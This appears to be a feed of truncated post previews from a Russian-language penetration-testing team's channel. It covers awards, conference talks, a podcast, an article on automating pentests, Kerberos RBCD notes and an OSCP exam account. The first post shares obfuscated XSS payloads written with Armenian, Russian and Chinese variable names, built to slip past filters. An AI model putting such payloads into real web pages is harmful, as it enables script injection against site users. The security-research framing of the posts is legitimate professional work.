GigaHackers

[ Интернациональные XSS ] Всем привет! 👋 Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках🔥 XSS по-армянски 🇦🇲 ա="",բ=!ա+ա,գ=!բ+ա,դ=ա+{},ե=բ[ա++],զ=բ[է=ա],ը=++է+ա,թ=դ[է+ը], բ[թ+=դ[ա]+(բ.գ+դ)[ա]+գ[ը]+ե+զ+բ[է]+թ+ե+դ[ա]+զ]թ")() XSS по-русски 🇷🇺 а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а], з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е]и")() XSS по-китайски 🇨🇳 甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲], 辛=++庚+甲,壬=丁[庚+辛], 乙[壬+=丁[甲]+(乙.丙+...

[ Когда Outlook перестает сомневаться ] Всем привет! 👋 В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, ко...

[ Итоги премии pentest award ] Друзья, всем привет! 👋 Недавно прошла церемония награждения премии Pentest award 2025 ▶️ В этом году GigaHackers укрепили свои позиции: @VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем BloodHoundIPA - ребята сделали fork популярного инструмента BloodHound для анализа доменов Active Directory и адаптировали его под домены на базе FreeIPA ⚡️ Чуть позже выпустим на канале отдельный пост про инструме...

[SOC Forum 2025] А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025. Старт доклада уже скоро 👋 Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает". 📆 20.11.2025 в 11:00 Мск, зал 4. Трансляция здесь. 🚀 ➡️ Проект за проектом, год за годом в процессе проведения пентеста приходится выполнять достаточно много рутинных действий. Это не только утомляет, но и неизбежно приводит к ошибкам, которые могут негативно повлиять на ИТ-инфр...

[ Нюансы RBCD ] Всем привет, друзья! В завершении года хочу поделиться интересным нюансом, связанным с эксплуатацией ограниченного делегирования на основе ресурсов Kerberos (англ. RBCD) в Active Directory 🔩 Многие специалисты по внутреннему пентесту знакомы с различными техниками абуза RBCD, поэтому детально вдаваться в механизм работы не буду, приложу дополнительно пару хороших мануалов про RBCD в целом: 👉 1. 👉 2. Перейдем сразу к интересной особенности На проекте мне в очередной раз встрети...

[Подкаст «Метод хакера»] Всем привет! 👋 Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках 💬🎵💬🎵. Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска: ➡️ Что скрывается за термином «пентест» и зачем он нужен? ➡️ Можно ли доверять сторонним специалистам по пентесту или лучше держать специалистов внутри компании? ➡️ Какие инструменты используют ...

[ Автоматизация пентеста — статья на habr ] Всем привет! 👋 По мотивам выступления на SOC Forum вышла статья на habr Ключевые пункты статьи: 💬 Зачем автоматизировать пентест 💬 С каких атак начать 💬 Тестирование автоматизации 💬 Проблемы при реализации 💬 Разведка 💬 Начальный доступ 💬 Эксплуатация 💬 Пример из реальной инфраструктуры @GigaHack #pentest

[ BUGS ZONE 6.0 ] Всем привет! 👋 Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty 🪲 Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих). Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎 Приятная мелочь, так как помню о первых баг...

[ OSCP 2026 ] 🤓 Часть 1 Всем привет! 👋 Пришла весна и пора возвращаться к контенту в канале. В начале февраля я получил сертификат OSCP/OSCP+(🤓/🤓) Несмотря на то, что сдал с 1 попытки — было не легко. Мне удалось набрать 80/100 баллов (для успешной сдачи необходимо набрать минимум 70 баллов): успешно взял две standalone-машины (low + root user) и полностью забрал сет Active Directory. В процессе подготовки и на самом экзамене держал в голове мысль, что это искусственная среда, а не реальный ...